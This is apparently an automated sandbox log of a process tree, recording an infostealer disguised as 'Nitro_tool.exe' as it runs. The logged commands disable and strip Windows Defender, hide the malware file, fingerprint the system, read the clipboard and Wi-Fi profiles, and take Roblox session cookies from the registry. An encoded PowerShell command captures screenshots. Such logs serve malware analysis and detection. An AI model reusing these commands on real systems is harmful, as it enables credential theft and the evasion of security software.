C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4996

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C8
1⤵
PID:4696

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3328

C:\Users\Admin\Downloads\Nitro_tool.exe
"C:\Users\Admin\Downloads\Nitro_tool.exe"
1⤵
- Executes dropped EXE
PID:4108
- C:\Users\Admin\Downloads\Nitro_tool.exe
  "C:\Users\Admin\Downloads\Nitro_tool.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nitro_tool.exe'"
    3⤵
    PID:4276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nitro_tool.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error', 0, 'Error', 0+16);close()""
    3⤵
    PID:3176
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error', 0, 'Error', 0+16);close()"
      4⤵
      PID:5636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4820
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:5372
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:1168
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1576
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Nitro_tool.exe""
    3⤵
    PID:5568
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\Downloads\Nitro_tool.exe"
      4⤵
      Views/modifies file attributes
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5668
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3904
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:6012
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:5980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5620
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4788
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:4392
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5984
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2124
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2364
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\icrraefy\icrraefy.cmdline"
        5⤵
        
        PID:6096
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9F9.tmp" "c:\Users\Admin\AppData\Local\Temp\icrraefy\CSCC1B8A7166A1D49B389FF2D15EABD6546.TMP"
        6⤵
        
        PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 912"
    3⤵
    PID:4020
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 912
      4⤵
      Kills process with taskkill
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3372
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5920
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4604"
    3⤵
    PID:1336
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4604
      4⤵
      Kills process with taskkill
      PID:1344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5628
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3680
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5640
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5916
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4088"
    3⤵
    PID:5436
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4088
      4⤵
      Kills process with taskkill
      PID:5240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1224
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2232
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4380"
    3⤵
    PID:868
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4380
      4⤵
      Kills process with taskkill
      PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1160
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3080"
    3⤵
    PID:3300
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3080
      4⤵
      Kills process with taskkill
      PID:5384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3892"
    3⤵
    PID:3084
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3892
      4⤵
      Kills process with taskkill
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3552"
    3⤵
    PID:2772
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3552
      4⤵
      Kills process with taskkill
      PID:4836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5388"
    3⤵
    PID:556
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5388
      4⤵
      Kills process with taskkill
      PID:5864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5816"
    3⤵
    PID:6040
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5816
      4⤵
      Kills process with taskkill
      PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 912"
    3⤵
    PID:3708
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5436
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 912
      4⤵
      Kills process with taskkill
      PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4088"
    3⤵
    PID:5364
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4788
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4088
      4⤵
      Kills process with taskkill
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4380"
    3⤵
    PID:1608
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4380
      4⤵
      Kills process with taskkill
      PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3080"
    3⤵
    PID:5584
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3080
      4⤵
      Kills process with taskkill
      PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2544
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3892"
    3⤵
    PID:4680
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3892
      4⤵
      Kills process with taskkill
      PID:5696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3552"
    3⤵
    PID:1776
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5240
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3552
      4⤵
      Kills process with taskkill
      PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5388"
    3⤵
    PID:5688
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2232
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5388
      4⤵
      Kills process with taskkill
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5816"
    3⤵
    PID:1160
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5816
      4⤵
      Kills process with taskkill
      PID:3308
- - C:\Windows\system32\cmd.exe
